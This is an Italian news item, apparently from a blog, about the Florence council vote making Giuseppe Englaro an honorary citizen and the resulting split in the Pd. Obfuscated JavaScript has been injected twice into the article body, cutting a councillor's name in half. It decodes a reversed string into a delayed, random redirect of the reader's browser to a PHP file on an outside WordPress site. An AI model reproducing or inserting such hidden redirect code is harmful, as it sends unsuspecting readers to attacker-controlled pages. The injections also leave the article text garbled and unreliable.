Englaro cittadino onorario di Firenze. Il Pd si è spaccato

image_pdfimage_print

Giuseppe Englaro, padre di Eluana, è da stasera cittadino onorario di Firenze. Lo ha sancito il  voto del consiglio comunale con 22 favorevoli, 16 contrari e 3 astenuti. Il Pd si è spaccato. Il sindaco, durante il dibattito, ha proposto di «trovare  un’altra modalità per esprimere la solidarietà ad Englaro»,  in quanto «una cittadinanza è tanto più sentita quanto più  è unanime». La capogruppo del Pd Rosa Maria Di Giorgi,  contraria al conferimento della cittadinanza, ha formalizzato  una proposta di rinvio. I proponenti, il socialista Aless (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andro  Falciani e la capogruppo di Unaltracittà/Unaltromondo Ornella  De Zordo, hanno chiesto che il rinvio avesse il tempo limite di  15 giorni, ma al diniego hanno votato contro.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2009/03/englaro.jpg”>englaroBocciato quindi a maggioranza il rinvio della delibera, si è  arrivati al voto dell’aula: dopo tre ore di serrato dibattito 22  consiglieri hanno votato a favore e la delibera è passata. Gli  astenuti sono Paolo Imperlati (Pd), la presidente della  commissione sanità del Pd Susanna Agostini e Ugo Caffaz, sempre  del Pd. Caffaz, Agostini e il vicecapogruppo del Pd Gianni  Amunni avevano cercato di mediare tra la loro volontà, come  quella di molti altri del gruppo, di votare a favore della  cittadinanza e quella di tenere nel dovuto conto la proposta del  sindaco, ma senza riuscirvi.

[Fonte: Unità]

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *